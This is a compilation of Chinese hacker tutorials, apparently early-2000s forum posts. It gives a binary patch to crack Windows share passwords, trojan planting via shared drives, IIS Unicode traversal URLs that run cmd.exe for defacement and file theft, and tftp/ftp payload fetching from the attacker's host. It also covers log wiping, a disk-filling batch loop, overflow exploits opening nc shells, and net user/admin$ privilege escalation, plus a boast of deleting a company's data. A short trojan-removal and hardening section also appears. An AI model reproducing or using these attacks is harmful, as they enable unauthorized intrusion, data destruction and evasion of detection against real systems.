dword ptr data_0461--; (137F4=137FCh)
03670 8B F2----mov--esi
edx
03672 2B C0----sub--eax
eax
03674 4F------dec--edi
03675------locloop_0445:----------; xref 0367C
03675 47------inc--edi
03676 AC------lodsb--; String [si] to al
03677 8A 04 18----mov--al
[eax][ebx]
0367A 3A 07-- cmp--al
[edi] ;BUG !!! I CAN SET ECX=1
0367C E1 F7 loopdz--locloop_0445 ; Loop if zf=1
ecx>0
0367E 5B-- pop--ebx
0367F 59---- pop--ecx
03680---- loc_0446:--; xref 03658
3662
36A1
03680 鶩8---- clc--; Clear carry flag
03681 C9---- leave----; Procedure exit
03682 C3---- retn
03683---- loc_0447: ; xref 0365D
03683 81 EC 000000E4--sub--esp
0E4h
03689 8B C4----mov--eax
esp
0368B 60------pushad--; Save all regs
0368C ?2------push--edx--; PARAMETER_4
0368D 50------push--eax--; PARAMETER_3
0368E 8B 45 08----mov--eax
dword ptr [ebp+PARAMETER_1]
03691 8B 40 24----mov--eax
dword ptr [eax+24h]
03694 50------push--eax--; PARAMETER_2
03695 57------push--edi--; PARAMETER_1
03696 E8 000036A1----call--sub_0054----; (06D3C)
0369B 83 C4 10----add--esp
10h
0369E 85 C0----test--eax
eax
036A0 61------popad--; Restore all regs
036A1 EB DD----jmp--short loc_0446--
好了,那就找客户端发密码的代码。下面是VREDIR。VXD的这段相关代码。
15FCE的18H就是前面的那比较18H的。这儿改成可以1。CALL SUB-0067是加密输入的密码的过程调用。15FEA 的EDX是指向输入的密码的指针。所以15FE9可以改成MOV AL,[EDX],
MOV [ECX],AL
JMP 15FF4
就可以。这样进入有密码的共享目录就可以用字母A-Z,数字0-9等试会很快的进入目录的。当然最好那儿自动这么变化那AL,免得每次还要输入可以加快速度。
15FC8 8B 4D EC--mov--ecx
dword ptr [ebp-14h]
15FCB 8B 55 F4 --mov--edx
dword ptr [ebp-0Ch]
15FCE 66| C7 41 07 0018--mov--word ptr [ecx+7]
18h; PASSWORD LONG
15FD4 83 C1 07----add--ecx
7
15FD7 83 C2 35----add--edx
35h
15FDA 8B 45 F8----mov--eax
dword ptr [ebp-8]
15FDD 83 C0 6C----add--eax
6Ch
15FE0 89 4D F0----mov--dword ptr [ebp-10h]
ecx
15FE3 8B 4D EC----mov--ecx
dword ptr [ebp-14h]
15FE6 83 C1 0B----add--ecx
0Bh
15FE9 51------push--ecx ;LOCKED PASSWORD SET HERE
15FEA 52------push--edx ;PASSWORD POINTER
15FEB 50------push--eax
15FEC E8 FFFF0EC5----call--sub_0067 ; LOCK THE PASSWORD----; (06EB6)
15FF1 83 C4 0C----add--esp
0Ch
15FF4 EB 71----jmp--short loc_1765--
然后--
改好后,复制到windos\system下覆盖掉原文件再重启一下就可以进行破解了。以上两种破解共享密码的方式,本人极力推荐后者,理论上它可以在几分钟内破解开任何难度的密码。但是暴力破解不是一点也没用,在万不得已的时候还是要用暴力破解的方式碰碰运气。至于为什么会仍然要用到远程暴力破解,你再看看下一节就明白了。
4.共享计算机的利用
在这我们只讲完全共享C盘的情况,这种情况是很理想的,因为我们可以利用植入木马的方式来获得共享电脑的完全控制权。但问题在于怎么远程运行木马。我们分两种情况:1.对方电脑开启了计划任务程序,我们先在自己的电脑上做好木马(推荐使用最新版“广外女生”木马),然后在自己的计划任务中添加这个运行木马的任务(不要让自己运行),再到自己电脑的c:\windows\Tasks
把那两个计划任务的文件拷到远程计算机的相应目录,再用ping IP time命令获知对方电脑的时间,最后根据这个时间重设远程计算机的计划程序使木马的计划任务过几分钟就运行(可别忘了拷给远程计算机一个木马)。2.拷给远程计算机一个木马,在 c:\windows\win.ini中配置,在[windows]段中的load=后写上你放置的木马的路径。这样只要对方重启过计算机后我们就可以进行控制了。
5.共享入侵的防范措施
最简单的方法就是取消所有共享
但如果你非要共享的话(尽量设为只读共享),那就要加上一个足够复杂的共享密码(混合的8位以上的密码),然后再下载一个共享目录的密码效验bug补丁。虽然入 侵者仍然可以试图通过暴力破解来解密,但是在实际中
只要你的密码够复杂,对手肯定没戏(这还得归功于共 享访问的蜗牛速度)。最后要提提的是不要中了别人的木马,特别是那些小巧的共享木马。所以我们上网还要 有一个强大的防火墙。国内的天网就是个不错的选择。
(以下是我利用此入侵技术的小片断):
版主的黑客片断
…………
在这前几天,我闯了祸:入侵一家深圳计算机公司的内部网,删光了公司的一大堆定单,并在删完后在空空的定单目录留下了一条挺张狂的黑客留言,内容是嘲笑公司的安全性。过了几天,我想起了这家公司,再入侵,发现加了个访问密码,不好入侵了。嘿嘿,就怕他的密码加的不长不复杂(最好有100000000位),用它的编码校验漏洞!仅仅用了两分钟,他的硬盘内容又出现在我的眼前………
8.27日下午,也就是上次入侵之后,我无意中发现了一台非常重要的计算机!在里面我看到了不少Email,内容是中国技术联播网给予各地区政府的账号,各地区政府部门可用它在中国技术联播和中国星火计划两大国家政府网站上发布当地的政治、经济文化和最新科技产品。并申明这是不可改的唯一账号,请各政府部门注意这一点。真的假的,我自学才一个月竟,我用sina搜索引挚找到了中国技术联播网,好像还是新开不久的网站
先用天津政府的账号试试,靠,真的进去了!oοО○
话外音:才自学了几天的黑客,用引挚反复狂搜hacker、黑客字眼,换来这种成果,现在想起来真是很爽.,。再一次申明,这篇文章是我真实的回忆!到现在,这个漏洞我也只总共玩了几天,我并不是什么黑客高手,甚至没有你们学网络安全学的时间长,只是一名稍懂点点毛坯的、对电脑很感兴趣的电脑爱好者。
哎哟哟,说了这么多了,我头晕眼花,手抖了脚也麻了,我倒@~@
警告:本文属作者xhacker,所有如果你要转载此文请保证本文的完整性!!!
1.删除灰鸽子服务端程序
由于在Windows环境下灰鸽子的服务端是处于运行状态,无法直接删除,所以必须进入纯DOS状态删除,删除命令如下:
cd c:\windows\system
attrib-r-s-h kernel32.exe
attrib-r-s-h notepod.exe
del kernel32.exe
del notepod.exe
还要注意,如果灰鸽子服务端设置了exe 文件关联的话,将会导致注册表编辑器无法运行,所以在删除服务端之前,先将注册表编辑器重命名,以便以后对注册表进行更改,操作命令如下:
ren c:\windows\regedit.exe regedit.com
2.删除注册表中启动键
由于我们改了注册表编辑器名称,所以要打开注册表编辑器应为:打开”开始“菜单”中的“运行”然后输入“regedit.com".启动注册表编辑器后,依次打开“HKEY-LOCAL-MACHINE\Software\Microsoft\windows\Current Version\Run",在右边的窗口中删除名称为”Loadwindows"的键值就可以了。
--------------------------------------------------------------------
清除文件关联
灰鸽子可以设置4种文件关联:exe关联,txt关联,ini关联,inf关联,其中exe关联可以和其他三种类型同时存在。
1.解除exe关联:
启动注册表编辑器,然后找到HKEY-CLASSES-ROOT\Exefile\shell\Open\Cpmmand主键,查看起默认的键值是不是系统默认的“%1%*”,如果被修改,则改成默认值.
2.解除txt关联:
打开注册表的HKEY-CLASSES-ROOT\txtfile\shell\open\command主键,其默认值的正常参数应该为“C:\windows\notepad.exe%1"
如果不是,请修改为正确数据。
3.解除ini关联:
INI文件的的关联配置保存在注册表HKEY-CLASSES-ROOT\Inffile\shell\Open\Cpmmand主键下,其默值数据也是“C:\windows\notepad.exe%1”,如果被修改的话,也要改回来。
4解除inf关联:
打开注册表的HKEY-CLASSES-ROOT\Inffile\shell\Open\Cpmmand主键,和ini
txt文件关联一样,其默认值也是“C:\windows\notepad.exe%1”,如果被修改,也要立刻改回正确的数据。
至此,灰鸽子已经被你彻底扫地出门了,你不再担心成为别人"盘中餐”了。
1,一台属于自己的可以上网的电脑。这样你可以有充分的支配权,上网不用说,否则你怎么看到我的文章?wap?呵呵!属于自己很重要,否则安全性是个很大的问题。第一点相信大家没有问题。
2,windows2000/nt,别和我说98/me,他们是你们同学用来玩游戏的!(当然,我也是铁杆game fan)对网络支持极差,命令受限制,很多软件又不能用,对黑客来说使用起来绊手绊脚,非常不利。这里我推荐2000,这是一个很成熟的系统(漏洞还是有一堆)。推荐双系统,这样黑玩搭配,干活不累。
3,冰河。中国第一木马,中者数不胜数,国人骄傲。虽然用冰河根本不能算黑客,但它确实能培养你对黑客的兴趣,同时帮助你了解网络,相信很多黑客同学都是这样起步的。静止写的那篇冰河教程很不错,大家仔细看看。而且,以后你学会入侵服务器后,用冰河操作也会减少工作量(我是懒虫,爽!)
4,oicq。我们学黑客,可不是学泡mm!bfctx你………… 息怒息怒!我们当然是学黑客,但不要忘了,众人拾柴火更高,我们通过cshu的成员列表,互相联系帮助,对提高水平很有帮助!另外我要废话一句:据我了解,现在黑客网站下载最多的都是针对oicq的破解工具,我个人认为很无聊,偷个密码代表什么,浪费时间!最后补充:mm不能不泡。(谁砸我??!!)
5,superscan。很好用的端口扫描器,速度超快,功能一流,一旦拥有,别无所求……(打住!)不论是找木马受害者,还是扫服务器端口,它都非常有效,cshu强烈推荐!
6,一本笔记本/便条,网上资料相当多,黑客处理的也是非常之多。良好的习惯决定了你的效率,准备一本笔记本,记录下你的成果,肉鸡,木马利用,命令,密码……坚持一下,你会发现你的效率大幅上升的!
7,lc3.著名nt/2000sam破解程序,有时我们拿不到足够权限,又没好办法,那么lc3是最好的解决办法,只要你拿的到sam,你就是服务器它爷爷!本站有其破解程序,支持了暴力破解!
8,程序合并。这是玩木马必需的,虽然木马是很低的手段,但有时配合巧办法(以后我会介绍)确实能够达到意想不到的效果,朋友们可以在空闲时玩玩木马,很有趣,若你能巧妙的骗过mm,那么webmaster也可能被你骗倒:〉(比较理想化)
9,流光4for 2000/nt。可能是世界上最好的综合类黑软!中国的骄傲,它集成了很全的漏洞信息,速度快,方法多,对有漏洞的主机是毁灭性的打击,操作又方便,是快速黑站必不可少的精品工具。超级吐血推荐!!
10,良好的心态,稳定的情绪,刻苦钻研的精神,刨根问底的作风,打扫房间的习惯。黑客是门很高深的学问,不要幻想一步登天,失败是常有的事,千万不可灰心。在那么多黑软的包围下,切不可完全依赖他们,一定要了解它们利用什么原理工作。对任何一个小问题,小细节,一定要问清楚,cshu就是给大家互相交流的场所哦!黑完后不要得意忘形,打扫战场也很重要,以防万一。
第一节操完,可能很无聊,我就这点水平,大家见谅!这里我说一句大话:做完菜鸟操,包你会黑简单的站(哎哟!心慌了!)
下一节操我们要介绍如何掌握一台主机的基本信息,期待中……
---------------------------------
真是太对不起大家了,隔了那么久才写这篇教程,我这几天实在太忙,大家还是体谅一下我吧,好了,开始做操。
今天的内容是获得主机的信息。 我们要黑一台主机,首先要了解它的信息,包括它的类型,用户列表,目录,端口,漏洞等等。
首先我们我们要找一台主机来练手,随便挑吧!www.flyingfish.com(乱说的)
第一部,呵呵,先在ie里看看吧,mmmm.....做的还行,挺精致的!主要是我们肯定了它现在是正常的。然后,我们应该知道它的ip,很简单,ping它一下就可以了。
ping www.flyingfish.com,看看窗口里有了什么?是不是有三行回应,其中的111.111.222.222就是ip了(还是胡说的,一个例子)。有人是不是要问,我这里怎么没有。那可能是两个原因,第一,你打错命令了;第二,该主机装了防火墙,禁止ping,不过这种可能很小。
知道了ip,下一步应该确定端口了。下面是一些常用的端口的默认值
21--ftp 重要哦
23--telnet 欢呼吧
25-smtp 尽管重要,但似乎没什么可利用的
53--domain 同上
79--finger 可知道用户信息了
80--http 要看网页,没它不行吧
110--pop 收信的
139--netbios 共享用的,很有利用价值哦
3389--win2000超级终端 呵呵,这个好!
其实端口有上千种,这些最最常用
我们怎么知道服务器有什么端口打开呢??去找个扫描器吧,x-scan ,super scan,flux等等很多哦。这里我推荐super scan ,速度很快,本站也有其教程哦!用法还是比较傻瓜的,估计大家不会有问题,轻轻几点,打开的端口就出现了。不错不错,上面说到的都有(太理想化了吧!)
那么我们该如何应对呢?
ps:忘了说一声,顺便扫一下7626,冰河有也说不准哦:)
若有ftp,那就用用匿名登陆。自己动手也行,最好用x-scan flux等吧!反正,有ftp就有一份希望
telnet在!好!telnet 111.111.222.222,出现窗口了吧!嗯?要密码?看来网管还不是超级白痴:)随便猜个,错了,闪人!
smtp,看着它,无奈
domain,一般它带了局域网了
finger 可以知道用户列表了,不好,忘了用法了,幸好finger很少出现
80肯定在,我们等会来对付它
110 有smtp,pop在也不奇怪了
139 找个扫描器来找找有没有露在外面的共享吧,日后也用得着
3389 太太太好了!!打开客户端吧,用输入法漏洞试试,成了就干了它!不成也没事,我们以后完全控制它3389会很方便的。
端口扫完了!我们在多了解它一点吧!追捕大家都知道吧,其实用它获取主机信息也不赖哦。打开追捕,输入ip,选择智能追捕,是不是有很多信息出来了?虽然不能直接利用,但毕竟我们有对它有了进一步的了解。
掌握了那么多信息,我们该做点什么了,一般黑客入侵都是靠着系统漏洞,不会都傻傻地去暴力破解的。我们现在就要看看它有什么漏洞。
对漏洞大家可能不太了解,我这里也不能一一说明了,太多了,感兴趣的话去论坛找freedom吧!
目前广泛利用和存在的漏洞有:unicode,unicode后续,iis溢出,.idq,.frontpage extend,输入法漏洞等等大漏洞。 至于如何确定,呵呵,绝对不会是一行一行地在ie中试吧,拿出x-scan吧,很好的扫描器哦!
稍微设置一下就上路吧!过了一会,呵呵,报告出来了,快看,哇!漏洞一大堆!这下赚了!各条漏洞都有详细的信息,大家看吧,总比我说的准了。
现在这台主机已经和我们成为亲戚了,要让这位亲爱的亲戚做点事,就要开始各种攻击了,下回我们就探讨一下最最可爱的unicode漏洞,各位可能就会在unicode中完成第一次黑客体验,再见:)
------------------------------------------
今天我们谈谈unicode漏洞,这可是基础中的基础,重点里的重点,不懂的一定要好好学。
2000年10月17日中联绿盟发布了以下的安全公告:
微软IIS 4.0 / 5.0 扩展UNICODE目录遍历漏洞
远程漏洞:是
本地漏洞:是
发布日期:2000年10月17日
更新日期:2000年10月17日
受影响的版本:
Microsoft IIS 5.0 + Microsoft Windows NT 2000 Microsoft IIS 4.0 + Microsoft Windows NT 4.0 + Microsoft BackOffice 4.5 - Microsoft Windows NT 4.0 + Microsoft BackOffice 4.0 - Microsoft Windows NT 4.0
这可是中国乃至全球网络安全界的一次大变节,入侵nt/2000系统变得如此简单,不打补丁的死路一条。
下面开始正式学习:
一,UNICODE漏洞的原理
此漏洞从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1,台湾繁体中文也同样存在这样的漏洞。
中文版的WIN2000中,UNICODE编码 存在BUG,在UNICODE 编码中
%c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'
%c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'
在NT4中/编码为%c1%9c
在英文版里: WIN2000英文版%c0%af
在中文win2k里:%c1%1c
此外还有多种编码,不一一阐述。
本文例子均以win2k为准,其他类型请自行替换。
二,一切从基础开始
由于winnt\system32\cmd.exe的存在,使远程执行命令变为可能,在浏览器里输入以下请求:(假设11.11.22.22有漏洞)
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
学过dos的应该可以看懂,其实就是利用当中的非法请求使我们可以连到system32下,如果inetpub\目录不合winnt同盘,或者目录级数有改动,可能会引起请求失败。
如果成功,那么在浏览区可看到如下信息:
Directory of C:\inetpub\scripts
2000-09-28 15:49 〈DIR〉 .
2000-09-28 15:49 〈DIR〉 .. (假设目录中没有文件,实际上有一大堆)
是不是有自己机器的感觉了,正点!就是这种感觉!
cmd.exe相当与dos里的command.com,因此,我们可以执行很多命令了!
http://11.11.22.22/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir (这个命令同样道理)
大家请注意:/c后面的+,实际上,他就是空格,请记牢!dir开始就是dos命令了,我们可以更改一下:
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\autoexec.bat+c:\winnt\auto.exe
会dos的朋友一定懂其意义了,不懂的请去看书 .
不用说,大家也知道我们就可以利用它来对有漏洞的机器展开攻击了!
三,实战演练
1,修改主页!(是不是很爽?)
一般主页位置在c:\inetpub\wwwroot下,但要是改了路径,就需要找找了。
最方便的方法:在浏览器里输入 http://11.11.22.22/.ida要是有漏洞,那在浏览器里便会显示主页路径,这个漏洞存在率很高,自然是我们的首选。
分析法:用dir看各个盘符的根目录,看可疑的就进去看,运气好的在一分钟里找到,这要看运气和直觉。
dir/s法:首先在看其主页,找个图片或连接,看它的文件名,比如,11.11.22.22首页上有一幅图片,右击,属性,看到了吗?iloveu.gif,然后我们利用unicode输入这条命令dir c:\iloveu.gif /s意味着查找c盘下所有目录里的iloveu.gif,注意实际应用时别忘了把空格改为+,如果没有继续找d盘,很快就能确定主页目录的。
找到了目录,就要对它开刀了!一般默认收页为index.htm,index.html,index.asp,default.htm,defautl.html,default.asp中的一个,现在我们确定11.11.22.22中为index.htm
那么我们就修改它吧!
最方便的方法:echo法。echo是一个系统命令,主要用于设置回应开关,而echo cshu >c:\autoexe.bat就是把cshu加入autoexec.bat里并删除原有内容,echo cshunice >>c:\autoexec.bat就是加入cshunice但不删除原有内容,这样我们就可以逍遥的改了。
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm
回应为:HTTP 500 - 内部服务器错误
通过对cmd的分析,袁哥得出一条简便的方法,加入"符号
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+2001730+>>c:\inetpub\wwwroot\index.htm
回应为:cgi错误,不用理会
两条命令一下,呵呵,再看看11.11.22.22,是不是烙上我们的大名了?不错吧
而在实际操作中,可能袁哥的方法也会失效,这时,我们就可以copy cmd.exe 为另一个exe,记住路径,用copy后的来echo
例如:11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+cmd.exe+c:\a.exe
11.11.22.22/scripts/..%c1%1c../a.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm
2,上传法:echo有点不讲道理,把人家的文件破坏了,要是想在主页上增光添彩,那就应该用改好的主页上传,这个我们后面介绍。
几点忠告:
1,对于没有主页的机器(就是正在建立的主页),不要改它,这很没水准,也很没道德
2,echo前记得帮他们做好备份
3,不准在主页里加入恶性语句
2,下载文件
要是有什么有用的文件被你发现,那我们如何下载呢?
最简单的方法:把文件copy至网页目录下。copy c:\email\baby.eml c:\inetpub\wwwroot\baby.zip,然后,下载11.11.22.22/baby.zip就行了,注意!实际应用中要记得对文件名进行修改,总之不能暴露。
别的方法:对不起,没想好:)
3,最重要的上传
一般方法:ftp法
首先建一个ftp脚本文件:c:\hehe.haha(名字乱取把),申请一个ftp账号,然后用echo吧
echo+open ftp.cshu.com(ftp主机) > c:\hehe.haha
echo+user yourname >> cc:\hehe.haha (yourname是用户名)
echo+yourpasswd >> c:\hehe.haha (yourpasswd是密码)
echo+get setup.exe >> c:\hehe.haha 要下载的文件
echo+quit >> c:\hehe.haha
完了以后:ftp+/s:c:\hehe.haha,由于是ftp主机,那么速度一定很快,过一会setup.exe就会出现在当前目录了(也就是cmd所在目录)
别忘了先上传到ftp主机,不要做马大哈哦!
最简单的方法:tftp法。
这种方法不用中转服务器,首先准备一个tftp服务端,它的作用就是把你的机器做成一个tftp服务器,利用漏洞机器来下载(注意,运行tftp时不要运行其他的ftp软件)
在这里我推荐cisco tftp server,自己去找找把,实在没有来找我:)
安装好后运行,别忘了设置好默认目录,否则会找不到文件
tftp命令:tftp -i 1.2.3.4 GET ihateu.exe c:\winnt\ihateu.exe(ihateu.exe在默认目录里)
1.2.3.4为你的ip,用unicode运行一下,会看到tftp server里有反应了,这就好了,不一会,文件就传上去了,方便把!
学会了上传,我们就可以好好改主页,还可以上传木马,还可以把程序放上去运行…………(运行程序和在dos里一样)
4,如何清除痕迹
虽然国内主机纪录ip的不是很多,但万事小心为妙,unicode权限达不到admin。用cleaniislog行不通,就…………直接删吧!
C:\winnt\system32\logfiles\*.*
C:\winnt\ssytem32\config\*.evt
C:\winnt\system32\dtclog\*.*
C:\winnt\system32\*.log
C:\winnt\system32\*.txt
C:\winnt\*.txt
C:\winnt\*.log
全……擦掉!
四,细节问题。
1,遇到长文件名怎么办?
c:\program files\
就用c:\"program20%files"\
2,遇到空格怎么办?
20%代替喽,或者xx yy=xxyy~1
3,如何做个很大的文件?
目的就是破坏啦!我不喜欢不过教教你们啦
@echo off
echo big > c:\a.a
:h
copy c:\a.a+c:\a.a c:\a.a
goto h
注意不要乱来啊!
4,输入命令,没反应或反应不对。
:)请检查检查再检查命令的正确性,可能没有漏洞,那就闪人!看在你看到这里那么给我面子的份上,在给你几个吧!
http://www.exsample.com/scripts/..À¯..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir+c :\ 或http://www.exsample.com/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 或http://www.exsample.com/_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 或http://www.exsample.com/_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
不一定有用哦!
5,如何找到unicode漏洞的主机
呵呵:)最好的方法自然是………………一个一个ping,一个一个试喽:)
不要打我呀!我说我说。最好找一个cgi扫描器,unicode查找器多如牛毛,随便找个吧!
6,我copy,del文件,怎么显示aceess denined?
这个不好办了,由于unicode所拥有的权限有限,出现上述情况很正常,我们要做的便是提高自己的权限!
这个我会在今后介绍,现在你可以试试attrib
attrib -r -h -s c:\autoexec.bat
再对autoexec.bat进行操作,看看有没有效果,成功率不高,不好意思!
7,我黑了主页,天下无敌?
我本来想对你说:“见你的鬼去吧!”不过想想不大礼貌,有失我绅士风度,所以改个口
echo主页或改主页在不懂黑客的人看起来很了不起,不过,它最多算是一个基础,拿到admin才是我们的终极目标!
对cshu全体成员来说,不准去改正在建立的网页!这是我们的原则!
要是你想耍耍威风,那也可以理解,那就去黑外国的,或者url欺骗也是个好选择
8,我如何做更多的事?
第一,努力提高权限
第二,由于cmd的限制,我们可以做的不多,那就要程序帮忙,上传吧!切记,要隐秘!
-----------------------------------------
一,frontpage扩展攻击。
为什么把它放第一位呢?原因很简单,它最最方便,frontpage服务器扩展是一种方便的远程站点管理功能,可是由于某些网管白痴的疏忽(为什么白痴满街飞?)不设置访问密码,如果那样的话,我们只要用一个frontpage就可以黑它了!!这完全不是黑客工具,但它确实办到了,还要感谢白痴网管和微软啊!
具体做法:
1,准备frontpage,我是用dreamweaver的,但它不能黑啊:)最好是2000版,只是不要是老掉牙的版本就行了。
2,找一台有frontpage扩展的主机,可以用流光,也可以用搜索引擎查找/_vti_pvt/,这是frontpage扩展的标志。
3,接下来打开frontpage,(妈妈:你在干什么?回答:做网页!妈妈:好孩子!^_^)文件菜单下选择“打开站点”,然后在文件夹框里写入http://11.11.22.22(我习惯用这个做例子,以fp2000为准)注意http://不要漏掉。在按下“打开”按钮前,不要忘了祈祷:)一两秒后,出现了文件夹,好啊!成功了,现在就可以操作网页文件了。
4,万一跳出错误信息,表示有密码(这个不算白痴)这时我们试着用以下url,http://11.11.22.22/_vti_pvt/service.pwd,这是默认的密码文件,下载下来,应该是unix的加密,找个解密器破密码吧!运气好的话还可以改网页。
我的看法:
这个漏洞只能说明网管的疏忽,对我们而言是没有什么利用价值的,只可以改改网页,也许这也够了,但要进一步控制主机,此漏洞就无能为力。消遣时可以玩玩。
二,iis.printer溢出攻击
据说缓冲区溢出攻击是黑客入侵时70%所选的方法,看起来有点夸张,但确实有道理,因为暴力密码破解在网络上变得非常之慢,而像unicode的解码漏洞所取得的权限又太低,而缓冲区溢出一般可取得system权限,是非常有用的!
具体原理我也不是很清楚,只能说个大概:当我们向系统发出超出缓冲区大小的数据处理请求时,便会引发溢出,并弹出错误对话框,我们常看到的“非法操作”其实也是可能是由于溢出。而当溢出时,eip发生错误,有汇编知识的朋友应该记得,eip是控制执行代码的位置(顺便问一下,有没有会crack的高人,记得做我老师)这时加入一段恶性代码,算好发生溢出时的eip值,这样溢出时就会执行恶性代码而不是当掉。非法操作我们知道多的不得了,因此……溢出攻击是非常强大的!
由于汇编对于我们来说较难掌握,加之对溢出的了解很有限,那么我们只能借助高手们的程序来黑了。
具体方法:
1,准备iishack,本站有下载,该版本可以对多种系统进行攻击。
2,用x-scan或流光扫描一个有iis.printer漏洞的主机,然后就可以攻击了。
3,在命令行方式执行iis5hack (主机ip) (端口号,默认80)(系统代号,具体可参考程序的说明)( shell口)
例如:iis5hack 11.11.22.22 80 1 111(以为在111端口开一个shell)
4,用nc或telnet连上,nc/telnet 11.11.22.22 111,成功的话就可以控制机器了,加个用户,做个代理……
我的看法:
这算是一个比较有用的漏洞了,它能帮助我们取得system权限,其实和admin差不了多少了,对于做一台跳板是非常有利的,希望大家熟练掌握。
三,idq/ida漏洞溢出攻击
这是时下很热门的了,原理和上面的printer相似,目前我只找到了iis5的攻击程序,在cshu里也可以找到的,我们准备的是snake的gui版本,很方便的。
具体方法:
1,准备snakeiis溢出程序。可以从本站下载。
2,ida/idq漏洞很多的,但win2k的服务器就不是那么普遍了,所以用你熟练的扫描器去找一打win2k的机器吧。
3,程序的界面是很傻瓜的,把ip填入,选择好类型,按下溢出按钮,显示shellcode发送完毕。
4,telnet/nc到你设定好的端口,如果成功的话,会显示目录下的信息(因为默认shellcode是dir)
5,欢呼吧!再次溢出,别忘了改shellcode为你想要的代码哦。
6,重复4,很快一台新鲜的win2k被你控制了!
我的看法:
我很喜欢用这种攻击,因为win2k的3389可以很方便的为我做事,省力地搞到一台win2k,然后慢慢享用,爽到根尖细胞啊!大家应该掌握这项方法。
四,*bsd telnetd溢出攻击
又是溢出,不过这个可是真正的热点哦,最近红盟等大型安全网站被黑就是因为这个!所以看看吧
具体方法:
1,使用fbsdhack for win2k来攻击,本站有下载的
2,还是要找到这样的主机,一般是xnix的,比较少的,用专门的扫描器吧,我会在不久放出来。
3,等吧!这个漏洞要发送的信息很大,大约16mb,可怕吧,所以最好用高速肉鸡
4,有幸成功了,记得请我吃饭!
我的看法:
这个漏洞的利用比较有难度,从找机器开始就是。但作为黑客爱好者,我们没有理由去回避它!
五,密码暴力破解
这是最最原始,也是最最基本的攻击的方式了,利用字典文件或暴力模式,对密码进行探测。费时费力,但若有经验的话,可以缩短这一过程。
具体方法:
1,找一个破解器,有ftp,http,smtp,pop3,telnet等等类型。
2,找到一台相应的主机。
3,设定一番,上路吧!你可以睡觉,可以去machine(就是做作业),可以去泡妞……就是不要傻等。为什么呢?因为会伤视力的:)怎么倒了一片,起来起来!
4,万一成功了(之所以用这个词,是因为成功率很低的)表明你运气旺,赶紧下线,买彩票去吧^_^
--------------------------------
大家好,这几天被cgi程序搞得头昏脑胀,主要还是51的错,什么破东西,那么多错误!现在只好暂时借人家的地方用。
这是菜鸟操的最后第二节,说实话我还可以写很多的,但是作业还欠了一大堆:(为什么我没有满舟的狗屎运?算了算了,我不合那种欺世盗名之辈一般见识,开始做操吧!
不知道大家对unicode和溢出攻击是不是熟练了?没有的要加油哦!今天我们来谈谈权限的提升。
在windows系统中,最高的权限掌握在administrators的手里,在xnix中称为root,我们要完全掌握一台机器,拿到admin是不可或缺的。
首先说说最简单的:system to admin
当我们用溢出攻击成功后,其实我们已经拿到了system权限(具体看每种攻击而可能有所不同)这时我们很容易拿到admin权限。首先看看一下命令:
net user 察看用户表 net user username pass /add(添加密码为pass的用户username)
net localgroup 察看组 net localgroup guests cshu /add 把cshu用户加入guests组
net use \\ip\ipc$ "password" /user:username 这是远程连接的命令
假如我们溢出了11.11.22.22,那么这样做吧!
net user (看到了iusr_machinename的用户了,它一般没什么权限的)
net user iusr_machinename cshu (把它的密码设为cshu)
net localgroup administrators iusr_machinename /add(加入administrators组)
这样我们就拥有了iusr_machinename这一账号,admin权限,简单吧!
熟悉一下net use 命令:
net use \\11.11.22.22\ipc$ "cshu" /user:iusr_machinename 建立连接
copy c:\haha.exe \\11.11.22.22\admin$ 把haha.exe 复制到机器c:\winnt\system32上,若是c$.d$,就表示c,d盘
net time \\11.11.22.22 看到了时间了,比如是8点
at \\11.11.22.22 8:03 haha.exe 就会在8点3分执行。
net use \\11.11.22.22 /delete 断开连接
应该是很简单的。这样我们就可以随心所欲地操作11.11.22.22了,admin是最高权限,所以没有限制的:)
是不是很简单?所以我是溢出是很厉害的攻击方法。
3389知道吧!如果能进入,那么用上面的命令也可以轻易拿到admin的,不过呢,有3389漏洞的机器已经不多了。看你运气了!(本站有几篇关于3389的好文章)
总的来说,还是unicode的机器最多,为什么白痴网管不会灭绝呢:)虽然unicode拿admin有一定难度,但还是要试试的。
首先,我们检查一下unicode在这台机器上的权限,一般看读写权限和运行权限。用copy 或del命令便可确定读写权限,然后上传文件运行一下便可知道运行权限。
1,如果我们可以对winnt\repair和winnt\config进行访问,sam文件就在里面(win2k里是sam,nt4里是sam._)那么用tftp 把get改成put下载下来,或者把它复制到inetpub\wwwroot下,改成zip下载。
拿到sam后,用lc3破解版暴力破解吧,这种方法比较费时。
2,要是有运行权限,拿就抛个木马上去吧!虽说木马可能也会没有权限,但自启动的模式在admin登陆后可能会自己提升了权限。要注意的是,最好放最新的木马,因为木马很容易被杀毒软件查杀!
3,其实和2差不多,只不过变成了键盘记录器,选个国产的,一般杀毒软件不会杀出来,认真配置好后传上去,下线睡觉或是做家务去!等到网管用了机器,密码就会被纪录下来,我们在去取,admin就顺利到手了:)
4,getadmin和pipeupadmin,前者是nt4用的,后者是2000。看看帮助知道使用方法后(其实猜都猜得到)就可以提升一个用户的权限,有一步登天的感觉!
5,手工做个bat文件,里面是建立用户等命令,然后把它放到自启动下,有很多途径:documents and settings下的开始菜单下的启动,知道了吧,至于要顺利放进去的话,会遇到空格长名等等问题,就看你的基本功了。win.ini里有load,加进去。还有便是注册表,好好研究一下regedit.
6,本地溢出。这个比较高深,我能告诉大家的只是,去四处找找本地溢出程序。
